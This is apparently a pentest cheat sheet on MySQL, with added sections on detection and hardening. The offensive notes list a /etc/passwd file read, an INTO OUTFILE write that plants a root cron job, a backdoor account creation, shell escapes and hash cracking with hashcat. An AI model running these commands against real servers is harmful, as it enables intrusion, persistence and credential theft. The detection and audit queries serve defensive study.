akde/infosec

Information security is ultimately about managing risk


Connect:

mysql --host=10.10.10.13 -P4444 -u admin admin

Various commands:

  • Read version:
    SELECT version();
  • Read user info:
    SELECT * FROM mysql.user;

Enumeration

Nmap scripts

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim
proxychains4 -q nmap -sV -sT -Pn -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim

Exploitation

Read and write

Read a file with the privileges of the MySQL server process:

SELECT load_file('/etc/passwd');

Write a file with the privileges of the MySQL daemon process:

CREATE TABLE bbb(content TEXT);
INSERT INTO bbb (content) VALUES ("* * * * * root /tmp/shell_80.elf");
SELECT * FROM bbb INTO OUTFILE '/etc/cron.d/ex1';
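The file read and write above leave a trace in the server's own general log. The following is an added example (not from the original page) that turns the general log on as a table and queries it for statements touching the filesystem; it assumes MySQL 5.7/8.0 (mysql.general_log with an `argument` mediumblob column) and an account allowed to change global variables.

```sql
-- Added example, not part of the original notes.
-- Write every statement to the mysql.general_log table. This is expensive
-- on a busy server: use it while investigating, not as a permanent setting.
SET GLOBAL log_output = 'TABLE';
SET GLOBAL general_log = 'ON';

-- The argument column is a BLOB, so LIKE on it is byte-wise and case-sensitive;
-- convert to a character string and lower-case it before matching.
SELECT event_time,
       user_host,                          -- e.g. admin[admin] @ [10.10.10.13]
       thread_id,
       command_type,
       CONVERT(argument USING utf8mb4) AS statement_text
FROM mysql.general_log
WHERE command_type = 'Query'
  AND (LOWER(CONVERT(argument USING utf8mb4)) LIKE '%load_file(%'
       OR LOWER(CONVERT(argument USING utf8mb4)) LIKE '%into outfile%'
       OR LOWER(CONVERT(argument USING utf8mb4)) LIKE '%into dumpfile%'
       OR LOWER(CONVERT(argument USING utf8mb4)) LIKE '%load data%')
ORDER BY event_time DESC;

-- Switch the log off again once the investigation is done.
SET GLOBAL general_log = 'OFF';
```

The `user_host` column attributes each statement to the account and the client address it came from, which is what a responder needs in order to tell the cron.d write above apart from a legitimate export. The general log records statements as received, so an `INTO OUTFILE` that failed on `secure_file_priv` still shows up, which makes the query useful for spotting attempts as well as successes.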

Notes

  • If --secure-file-priv is not set, root can be obtained.
  • MySQL runs as root? Check out the raptor exploit.
  • Use --protocol tcp to force TCP (no socket)
  • When (e.g. in meterpreter) the interactive session doesn't work, execute commands like this:
    mysql.exe -u root -Bse "SHOW DATABASES;"
    • Note: Empty password = NO -p flag!
  • Create a user and then log in from another host:
    mysql.exe -u root -Bse "CREATE USER 'fffff'@'%' IDENTIFIED BY '3o4eworhhgfkurtz5o654';"
    mysql.exe -u root -Bse "GRANT ALL ON *.* to fffff@'%' IDENTIFIED BY '3o4eworhhgfkurtz5o654';"
    mysql.exe -u root -Bse "FLUSH PRIVILEGES;"

  • Use within a MySQL shell to get a shell:
    system shell
  • Queries can be written into files:
    SELECT order_id,product_name,qty FROM orders
    INTO OUTFILE '/tmp/orders.txt';
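Every item in the notes above depends on a server setting or privilege that can be checked and closed from the SQL shell. The following is an added example (not from the original page) that audits those settings and shows the matching remediation; it assumes MySQL 5.7/8.0 column names (`mysql.user.authentication_string`, `plugin`, `File_priv`), and `'app'@'10.%'` and `'report'@'localhost'` are placeholder accounts.

```sql
-- Added example, not part of the original notes.

-- 1. Is the filesystem reachable from SQL at all?
--    NULL  -> LOAD_FILE()/INTO OUTFILE disabled (recommended)
--    ''    -> any path the mysqld OS user can reach (the cron.d write works)
--    /dir  -> imports and exports confined to that directory
SHOW VARIABLES LIKE 'secure_file_priv';

-- 2. Who holds the FILE privilege that LOAD_FILE() and INTO OUTFILE require?
SELECT user, host FROM mysql.user WHERE File_priv = 'Y';

-- 3. Accounts reachable from any host, and accounts with no password at all
--    (the "NO -p flag" case from the notes).
SELECT user, host, plugin
FROM mysql.user
WHERE host = '%' OR authentication_string = '';

-- 4. Is the server exposed on the network, and is client-side file loading on?
SHOW VARIABLES WHERE Variable_name IN ('bind_address', 'skip_networking', 'local_infile');

-- Remediation for typical findings: remove the backdoor-style account from the
-- notes, pull FILE from accounts that do not need it, set a password where
-- one is missing.
DROP USER IF EXISTS 'fffff'@'%';
REVOKE FILE ON *.* FROM 'app'@'10.%';                      -- placeholder account
ALTER USER 'report'@'localhost' IDENTIFIED BY 'REPLACE_WITH_A_STRONG_PASSWORD';
FLUSH PRIVILEGES;

-- secure_file_priv is read-only at runtime; set it in my.cnf and restart:
-- [mysqld]
-- secure_file_priv = NULL        (or a dedicated export directory)
-- local_infile = 0
```

Check 1 is the single most important line: with `secure_file_priv` at NULL, neither the `/etc/passwd` read nor the `/etc/cron.d` write in the notes is possible regardless of who holds FILE. Check 2 matters because FILE is a global privilege and is often granted as part of `GRANT ALL ON *.*` without anyone intending it.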

Password cracking

If you have root on the host, you can crack the credentials the following way:

Stop MySQL

# service mysql stop
mysql stop/waiting

Start MySQL

# mysqld_safe --skip-grant-tables --skip-syslog --skip-networking

Open MySQL shell

# mysql -u root mysql

Query the user table

mysql> SELECT * FROM user;

Obtain the password hashes (without the leading *), add them to a file and ask Hashcat for help:

hashcat -m300 -a0 --self-test-disable /tmp/hash /opt/all_seclist_with_rockyou.txt
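The reason for mode 300 and for stripping the leading `*` is the way `mysql_native_password` builds its hash. The following is an added example (not from the original page) that reproduces the hash in SQL and pulls hashes from `mysql.user` in the form the hashcat step expects; it assumes MySQL 5.7/8.0 column names (`authentication_string`, `plugin`), and the literal `'password'` is a constructed sample.

```sql
-- Added example, not part of the original notes.

-- mysql_native_password stores '*' followed by UPPER(SHA1(SHA1(pw))), where the
-- inner digest is hashed as raw bytes (hence UNHEX). That double SHA1 is what
-- hashcat -m 300 computes; the '*' is only a format marker, so it is dropped.
SELECT CONCAT('*', UPPER(SHA1(UNHEX(SHA1('password'))))) AS native_hash;

-- Export only the accounts that actually use that plugin, with the '*' removed,
-- one hash per line as the hashcat input file expects.
SELECT CONCAT(user, '@', host)             AS account,
       SUBSTRING(authentication_string, 2) AS hashcat_m300
FROM mysql.user
WHERE plugin = 'mysql_native_password'
  AND authentication_string LIKE '*%';

-- Accounts on caching_sha2_password (the MySQL 8.0 default) store a salted
-- '$A$005$...' string instead; mode 300 does not apply to those.
SELECT user, host, LEFT(authentication_string, 8) AS prefix
FROM mysql.user
WHERE plugin = 'caching_sha2_password';
```

For the sample `'password'` the first query returns `*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19`, the widely known value for that password under this scheme. Running the second query against your own server and feeding the result to the hashcat line above is the quickest way to find which service accounts still sit on a dictionary word; the third query tells you which accounts are already on the stronger salted scheme and are not covered by this check.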
